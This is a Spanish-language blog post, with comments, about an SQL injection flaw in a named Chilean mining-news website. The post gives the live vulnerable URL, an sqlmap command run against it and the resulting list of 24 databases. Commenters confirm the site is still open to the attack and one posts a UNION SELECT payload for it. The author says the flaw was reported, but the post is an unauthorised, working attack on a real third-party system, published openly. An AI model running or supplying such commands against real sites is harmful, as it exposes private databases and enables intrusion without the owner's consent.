Hola, bueno en esta oportunidad, me tope con un sitio web que a simple vista parece ser muy segura, por su infraestructura y sus diseños; pero también cabe recalcar que los sitios webs por mas "bonito" que se vea no son 100% segura.
Basándome en eso y viendo que es una web de la MINERÍA CHILENA, empece a ver sus módulos, links externos, etc... llegando así a encontrar una SQL Injection, en unos de sus módulos como es la de /revistas.
Actualmente el 70% de sitios webs son vulnerables a este tipo de bug (SQL) la cual los programadores que realizan el trabajo de crear el sitio web y programarla para que no tenga ninguna vulnerabilidad; solo crean la web y nunca mas la actualizan, dado asi que siempre están y estaran vulnerable.
Target: http://www.mch.cl/
Link Vulnerable: http://www.mch.cl/revistas/index_neo.php?id=1
Vulnerabilidad: SQL Injection
Veamos su base de datos desde el SQLMAP:
./sqlmap.py -u http://www.mch.cl/revistas/index_neo.php?id=1 --dbs
available databases [24]:
[*] 15a0
[*] agroeconomico
[*] christensen
[*] conferencias
[*] correos
[*] elecgas
[*] electricidad
[*] enviomail
[*] eventos
[*] ftpserver
[*] information_schema
[*] joomla
[*] latinomineria
[*] mch
[*] megaminas
[*] minisitio_exploracion
[*] mysql
[*] renovacion
[*] reportes
[*] sugarCE
[*] sustentare
[*] sutmin
[*] test
[*] vendimia
La vulnerabilidad ya ha sido reportada & ando esperando alguna respuesta.
Saludos.
:) revise hoy la vulnerabilidad y aun sigue, no ah sido reparada :D eh aprendido mucho en tu blog.
ResponderEliminarSaludos
aun esta la vulnerabilidad, no le han hecho nada xD revise todo.que penca que siendo mas encima una pagina de minera de chile no le pongan atencion
ResponderEliminara algo tan basico como puede ser tu propia web. sistema penca.
Todavía está la weá, jajajaja XD.
ResponderEliminar-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35.............en cual se vulnera aun no la vulnero
ResponderEliminar